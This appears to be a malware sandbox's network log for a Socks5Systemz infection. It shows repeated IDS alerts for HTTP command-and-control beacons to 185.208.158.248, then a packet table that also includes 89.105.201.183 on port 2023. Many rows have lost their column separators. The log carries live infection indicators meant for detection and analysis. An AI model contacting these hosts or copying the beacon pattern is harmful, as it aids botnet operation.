2024-10-03T08:40:24.748977+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49736 | 185.208.158.248 | 80 | TCP
2024-10-03T08:40:25.095004+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49736 | 185.208.158.248 | 80 | TCP
2024-10-03T08:40:25.951345+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49737 | 185.208.158.248 | 80 | TCP
                                                                                                    2024-10-03T08:40:26.309689+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549737185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:26.660761+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549737185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:27.473539+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549738185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:28.281045+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549739185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:29.573724+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549740185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:29.920486+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549740185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:30.274094+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549740185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:31.086834+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549741185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:31.954102+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549742185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:32.796761+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549743185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:33.609989+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549744185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:34.425353+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549745185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:35.274022+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549746185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:36.073350+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549747185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:36.429599+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549747185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:37.238142+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549748185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:38.061539+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549749185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:38.412198+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549749185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:39.225451+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549750185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:40.026491+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549751185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:40.389709+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549751185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:40.732228+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549751185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:41.558714+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549752185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:41.908031+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549752185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:42.893022+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549753185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:43.713226+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549754185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:44.063249+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549754185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:44.974334+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549755185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:46.182575+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549756185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:46.530399+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549756185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:47.354128+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549757185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:48.187718+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549758185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:49.043864+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549759185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:49.396093+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549759185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:50.227981+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549760185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:51.027289+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549761185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:51.381067+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549761185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:52.430482+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549764185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:53.253641+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549765185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:54.075772+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549766185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:54.886719+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549767185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:55.242928+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549767185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:56.045580+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549768185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:56.394950+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549768185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:57.227686+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549769185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:58.064857+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549772185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:59.087367+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549773185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:59.934414+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549774185.208.158.24880TCP
                                                                                                    2024-10-03T08:41:00.787445+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549775185.208.158.24880TCP
                                                                                                    2024-10-03T08:41:01.898165+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549776185.208.158.24880TCP
                                                                                                    2024-10-03T08:41:02.736191+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549777185.208.158.24880TCP
                                                                                                    2024-10-03T08:41:03.596214+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549778185.208.158.24880TCP
                                                                                                    2024-10-03T08:41:04.426341+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549779185.208.158.24880TCP
                                                                                                    2024-10-03T08:41:05.350713+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549780185.208.158.24880TCP
                                                                                                    2024-10-03T08:41:07.092511+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549781185.208.158.24880TCP
                                                                                                    2024-10-03T08:41:07.965780+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549782185.208.158.24880TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 3, 2024 08:39:57.298666954 CEST | 49711 | 80 | 192.168.2.5 | 185.208.158.248
Oct 3, 2024 08:39:57.303957939 CEST | 80 | 49711 | 185.208.158.248 | 192.168.2.5
Oct 3, 2024 08:39:57.304050922 CEST | 49711 | 80 | 192.168.2.5 | 185.208.158.248
Oct 3, 2024 08:39:57.304194927 CEST | 49711 | 80 | 192.168.2.5 | 185.208.158.248
Oct 3, 2024 08:39:57.309710026 CEST | 80 | 49711 | 185.208.158.248 | 192.168.2.5
Oct 3, 2024 08:39:57.996258020 CEST | 80 | 49711 | 185.208.158.248 | 192.168.2.5
Oct 3, 2024 08:39:57.996325016 CEST | 49711 | 80 | 192.168.2.5 | 185.208.158.248
Oct 3, 2024 08:39:58.177089930 CEST | 49711 | 80 | 192.168.2.5 | 185.208.158.248
Oct 3, 2024 08:39:58.181230068 CEST | 49712 | 80 | 192.168.2.5 | 185.208.158.248
Oct 3, 2024 08:39:58.182334900 CEST | 80 | 49711 | 185.208.158.248 | 192.168.2.5
Oct 3, 2024 08:39:58.182415009 CEST | 49711 | 80 | 192.168.2.5 | 185.208.158.248
Oct 3, 2024 08:39:58.186148882 CEST | 80 | 49712 | 185.208.158.248 | 192.168.2.5
Oct 3, 2024 08:39:58.186230898 CEST | 49712 | 80 | 192.168.2.5 | 185.208.158.248
Oct 3, 2024 08:39:58.200680017 CEST | 49712 | 80 | 192.168.2.5 | 185.208.158.248
Oct 3, 2024 08:39:58.205516100 CEST | 80 | 49712 | 185.208.158.248 | 192.168.2.5
Oct 3, 2024 08:39:58.879477024 CEST | 80 | 49712 | 185.208.158.248 | 192.168.2.5
Oct 3, 2024 08:39:58.879561901 CEST | 49712 | 80 | 192.168.2.5 | 185.208.158.248
Oct 3, 2024 08:39:58.880470037 CEST | 49714 | 2023 | 192.168.2.5 | 89.105.201.183
Oct 3, 2024 08:39:58.885310888 CEST | 2023 | 49714 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:39:58.885400057 CEST | 49714 | 2023 | 192.168.2.5 | 89.105.201.183
Oct 3, 2024 08:39:58.885431051 CEST | 49714 | 2023 | 192.168.2.5 | 89.105.201.183
Oct 3, 2024 08:39:58.890311956 CEST | 2023 | 49714 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:39:58.890374899 CEST | 49714 | 2023 | 192.168.2.5 | 89.105.201.183
Oct 3, 2024 08:39:58.895153046 CEST | 2023 | 49714 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:39:59.494227886 CEST | 2023 | 49714 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:39:59.540762901 CEST | 49714 | 2023 | 192.168.2.5 | 89.105.201.183
Oct 3, 2024 08:40:01.512636900 CEST | 49712 | 80 | 192.168.2.5 | 185.208.158.248
Oct 3, 2024 08:40:01.517575979 CEST | 80 | 49712 | 185.208.158.248 | 192.168.2.5
Oct 3, 2024 08:40:01.788605928 CEST | 80 | 49712 | 185.208.158.248 | 192.168.2.5
Oct 3, 2024 08:40:01.788815975 CEST | 49712 | 80 | 192.168.2.5 | 185.208.158.248
Oct 3, 2024 08:40:01.904004097 CEST | 49712 | 80 | 192.168.2.5 | 185.208.158.248
Oct 3, 2024 08:40:01.904375076 CEST | 49715 | 80 | 192.168.2.5 | 185.208.158.248
Oct 3, 2024 08:40:01.909265041 CEST | 80 | 49715 | 185.208.158.248 | 192.168.2.5
Oct 3, 2024 08:40:01.909426928 CEST | 49715 | 80 | 192.168.2.5 | 185.208.158.248
Oct 3, 2024 08:40:01.909507036 CEST | 49715 | 80 | 192.168.2.5 | 185.208.158.248
Oct 3, 2024 08:40:01.909580946 CEST | 80 | 49712 | 185.208.158.248 | 192.168.2.5
Oct 3, 2024 08:40:01.909677029 CEST | 49712 | 80 | 192.168.2.5 | 185.208.158.248
Oct 3, 2024 08:40:01.914351940 CEST | 80 | 49715 | 185.208.158.248 | 192.168.2.5
Oct 3, 2024 08:40:02.619884014 CEST | 80 | 49715 | 185.208.158.248 | 192.168.2.5
Oct 3, 2024 08:40:02.620011091 CEST | 49715 | 80 | 192.168.2.5 | 185.208.158.248
Oct 3, 2024 08:40:02.620896101 CEST | 49716 | 2023 | 192.168.2.5 | 89.105.201.183
Oct 3, 2024 08:40:02.625998020 CEST | 2023 | 49716 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:02.626116991 CEST | 49716 | 2023 | 192.168.2.5 | 89.105.201.183
Oct 3, 2024 08:40:02.626159906 CEST | 49716 | 2023 | 192.168.2.5 | 89.105.201.183
Oct 3, 2024 08:40:02.626209021 CEST | 49716 | 2023 | 192.168.2.5 | 89.105.201.183
Oct 3, 2024 08:40:02.730813026 CEST | 49715 | 80 | 192.168.2.5 | 185.208.158.248
Oct 3, 2024 08:40:02.863692045 CEST | 2023 | 49716 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:02.865030050 CEST | 80 | 49715 | 185.208.158.248 | 192.168.2.5
Oct 3, 2024 08:40:02.903318882 CEST | 2023 | 49716 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:03.096632004 CEST | 80 | 49715 | 185.208.158.248 | 192.168.2.5
Oct 3, 2024 08:40:03.096771002 CEST | 49715 | 80 | 192.168.2.5 | 185.208.158.248
Oct 3, 2024 08:40:03.216275930 CEST | 49715 | 80 | 192.168.2.5 | 185.208.158.248
Oct 3, 2024 08:40:03.216742992 CEST | 49717 | 80 | 192.168.2.5 | 185.208.158.248
Oct 3, 2024 08:40:03.221601009 CEST | 80 | 49715 | 185.208.158.248 | 192.168.2.5
Oct 3, 2024 08:40:03.221621037 CEST | 80 | 49717 | 185.208.158.248 | 192.168.2.5
Oct 3, 2024 08:40:03.221760035 CEST | 49717 | 80 | 192.168.2.5 | 185.208.158.248
Oct 3, 2024 08:40:03.222007036 CEST | 49717 | 80 | 192.168.2.5 | 185.208.158.248
Oct 3, 2024 08:40:03.222016096 CEST | 49715 | 80 | 192.168.2.5 | 185.208.158.248
Oct 3, 2024 08:40:03.226850986 CEST | 80 | 49717 | 185.208.158.248 | 192.168.2.5
Oct 3, 2024 08:40:03.290044069 CEST | 2023 | 49716 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:03.290169954 CEST | 49716 | 2023 | 192.168.2.5 | 89.105.201.183
Oct 3, 2024 08:40:03.912508011 CEST | 80 | 49717 | 185.208.158.248 | 192.168.2.5
Oct 3, 2024 08:40:03.912592888 CEST | 49717 | 80 | 192.168.2.5 | 185.208.158.248
Oct 3, 2024 08:40:04.136853933 CEST | 49717 | 80 | 192.168.2.5 | 185.208.158.248
Oct 3, 2024 08:40:04.142277002 CEST | 80 | 49717 | 185.208.158.248 | 192.168.2.5
Oct 3, 2024 08:40:04.142364025 CEST | 49717 | 80 | 192.168.2.5 | 185.208.158.248
Oct 3, 2024 08:40:04.142419100 CEST | 49718 | 80 | 192.168.2.5 | 185.208.158.248
Oct 3, 2024 08:40:04.147305965 CEST | 80 | 49718 | 185.208.158.248 | 192.168.2.5
Oct 3, 2024 08:40:04.147394896 CEST | 49718 | 80 | 192.168.2.5 | 185.208.158.248
Oct 3, 2024 08:40:04.148631096 CEST | 49718 | 80 | 192.168.2.5 | 185.208.158.248
Oct 3, 2024 08:40:04.153491974 CEST | 80 | 49718 | 185.208.158.248 | 192.168.2.5
Oct 3, 2024 08:40:04.832319975 CEST | 80 | 49718 | 185.208.158.248 | 192.168.2.5
Oct 3, 2024 08:40:04.832385063 CEST | 49718 | 80 | 192.168.2.5 | 185.208.158.248
Oct 3, 2024 08:40:04.949517012 CEST | 49718 | 80 | 192.168.2.5 | 185.208.158.248
Oct 3, 2024 08:40:04.949896097 CEST | 49719 | 80 | 192.168.2.5 | 185.208.158.248
Oct 3, 2024 08:40:04.954643965 CEST | 80 | 49718 | 185.208.158.248 | 192.168.2.5
Oct 3, 2024 08:40:04.954737902 CEST | 80 | 49719 | 185.208.158.248 | 192.168.2.5
Oct 3, 2024 08:40:04.954756975 CEST | 49718 | 80 | 192.168.2.5 | 185.208.158.248
Oct 3, 2024 08:40:04.954829931 CEST | 49719 | 80 | 192.168.2.5 | 185.208.158.248
Oct 3, 2024 08:40:04.955013037 CEST | 49719 | 80 | 192.168.2.5 | 185.208.158.248
Oct 3, 2024 08:40:04.962806940 CEST | 80 | 49719 | 185.208.158.248 | 192.168.2.5
Oct 3, 2024 08:40:05.669584036 CEST | 80 | 49719 | 185.208.158.248 | 192.168.2.5
Oct 3, 2024 08:40:05.669677019 CEST | 49719 | 80 | 192.168.2.5 | 185.208.158.248
Oct 3, 2024 08:40:05.777793884 CEST | 49719 | 80 | 192.168.2.5 | 185.208.158.248
Oct 3, 2024 08:40:05.782747984 CEST | 80 | 49719 | 185.208.158.248 | 192.168.2.5
Oct 3, 2024 08:40:06.018551111 CEST | 80 | 49719 | 185.208.158.248 | 192.168.2.5
Oct 3, 2024 08:40:06.018610001 CEST | 49719 | 80 | 192.168.2.5 | 185.208.158.248
Oct 3, 2024 08:40:06.136887074 CEST | 49719 | 80 | 192.168.2.5 | 185.208.158.248
Oct 3, 2024 08:40:06.137259007 CEST | 49720 | 80 | 192.168.2.5 | 185.208.158.248
Oct 3, 2024 08:40:06.142250061 CEST | 80 | 49720 | 185.208.158.248 | 192.168.2.5
Oct 3, 2024 08:40:06.142268896 CEST | 80 | 49719 | 185.208.158.248 | 192.168.2.5
Oct 3, 2024 08:40:06.142338037 CEST | 49720 | 80 | 192.168.2.5 | 185.208.158.248
Oct 3, 2024 08:40:06.142364025 CEST | 49719 | 80 | 192.168.2.5 | 185.208.158.248
Oct 3, 2024 08:40:06.142477989 CEST | 49720 | 80 | 192.168.2.5 | 185.208.158.248
Oct 3, 2024 08:40:06.147222042 CEST | 80 | 49720 | 185.208.158.248 | 192.168.2.5
Oct 3, 2024 08:40:06.831357956 CEST | 80 | 49720 | 185.208.158.248 | 192.168.2.5
Oct 3, 2024 08:40:06.831496954 CEST | 49720 | 80 | 192.168.2.5 | 185.208.158.248
Oct 3, 2024 08:40:06.950143099 CEST | 49720 | 80 | 192.168.2.5 | 185.208.158.248
Oct 3, 2024 08:40:06.955332041 CEST | 80 | 49720 | 185.208.158.248 | 192.168.2.5
Oct 3, 2024 08:40:06.956994057 CEST | 49720 | 80 | 192.168.2.5 | 185.208.158.248
Oct 3, 2024 08:40:06.960907936 CEST | 49721 | 80 | 192.168.2.5 | 185.208.158.248
Oct 3, 2024 08:40:06.965789080 CEST | 80 | 49721 | 185.208.158.248 | 192.168.2.5
Oct 3, 2024 08:40:06.965984106 CEST | 49721 | 80 | 192.168.2.5 | 185.208.158.248
Oct 3, 2024 08:40:06.966164112 CEST | 49721 | 80 | 192.168.2.5 | 185.208.158.248
Oct 3, 2024 08:40:06.970930099 CEST | 80 | 49721 | 185.208.158.248 | 192.168.2.5
Oct 3, 2024 08:40:08.481785059 CEST | 80 | 49721 | 185.208.158.248 | 192.168.2.5
Oct 3, 2024 08:40:08.481849909 CEST | 49721 | 80 | 192.168.2.5 | 185.208.158.248
Oct 3, 2024 08:40:08.484606028 CEST | 80 | 49721 | 185.208.158.248 | 192.168.2.5
Oct 3, 2024 08:40:08.484657049 CEST | 49721 | 80 | 192.168.2.5 | 185.208.158.248
Oct 3, 2024 08:40:08.486325979 CEST | 80 | 49721 | 185.208.158.248 | 192.168.2.5
Oct 3, 2024 08:40:08.486372948 CEST | 49721 | 80 | 192.168.2.5 | 185.208.158.248
Oct 3, 2024 08:40:08.590416908 CEST | 49721 | 80 | 192.168.2.5 | 185.208.158.248
                                                                                                    Oct 3, 2024 08:40:08.595355034 CEST8049721185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:08.830358028 CEST8049721185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:08.830451965 CEST4972180192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:08.949470997 CEST4972180192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:08.949847937 CEST4972280192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:08.954657078 CEST8049722185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:08.954683065 CEST8049721185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:08.954737902 CEST4972280192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:08.954771042 CEST4972180192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:08.954951048 CEST4972280192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:08.959722996 CEST8049722185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:09.645920992 CEST8049722185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:09.645984888 CEST4972280192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:09.762022018 CEST4972280192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:09.762362003 CEST4972380192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:09.767218113 CEST8049723185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:09.767236948 CEST8049722185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:09.767357111 CEST4972280192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:09.767479897 CEST4972380192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:09.767479897 CEST4972380192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:09.772250891 CEST8049723185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:10.454655886 CEST8049723185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:10.454749107 CEST4972380192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:10.574171066 CEST4972380192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:10.574527025 CEST4972480192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:10.579529047 CEST8049723185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:10.579549074 CEST8049724185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:10.579622984 CEST4972380192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:10.579647064 CEST4972480192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:10.579782963 CEST4972480192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:10.584629059 CEST8049724185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:11.274789095 CEST8049724185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:11.275120020 CEST4972480192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:11.387032986 CEST4972480192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:11.391966105 CEST8049724185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:11.624023914 CEST8049724185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:11.624285936 CEST4972480192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:11.730504990 CEST4972480192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:11.735574961 CEST8049724185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:11.967400074 CEST8049724185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:11.967612982 CEST4972480192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:12.082320929 CEST4972480192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:12.087251902 CEST8049724185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:12.328104973 CEST8049724185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:12.328222036 CEST4972480192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:12.449528933 CEST4972480192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:12.449938059 CEST4972580192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:12.454757929 CEST8049724185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:12.454792976 CEST8049725185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:12.454931974 CEST4972480192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:12.454991102 CEST4972580192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:12.455183029 CEST4972580192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:12.460171938 CEST8049725185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:13.668616056 CEST8049725185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:13.668705940 CEST4972580192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:13.668803930 CEST8049725185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:13.668863058 CEST4972580192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:13.668948889 CEST8049725185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:13.668989897 CEST4972580192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:13.778165102 CEST4972580192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:13.783169985 CEST8049725185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:14.019181013 CEST8049725185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:14.019252062 CEST4972580192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:14.137742996 CEST4972580192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:14.138145924 CEST4972680192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:14.143264055 CEST8049725185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:14.143347979 CEST4972580192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:14.143433094 CEST8049726185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:14.143506050 CEST4972680192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:14.143680096 CEST4972680192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:14.148468018 CEST8049726185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:14.838619947 CEST8049726185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:14.838728905 CEST4972680192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:14.965122938 CEST4972680192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:14.965531111 CEST4972780192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:14.970313072 CEST8049727185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:14.970429897 CEST4972780192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:14.970506907 CEST4972780192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:14.970963001 CEST8049726185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:14.971015930 CEST4972680192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:14.975256920 CEST8049727185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:15.663813114 CEST8049727185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:15.663948059 CEST4972780192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:15.778233051 CEST4972780192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:15.778598070 CEST4972880192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:15.783540010 CEST8049728185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:15.783612967 CEST4972880192.168.2.5185.208.158.248
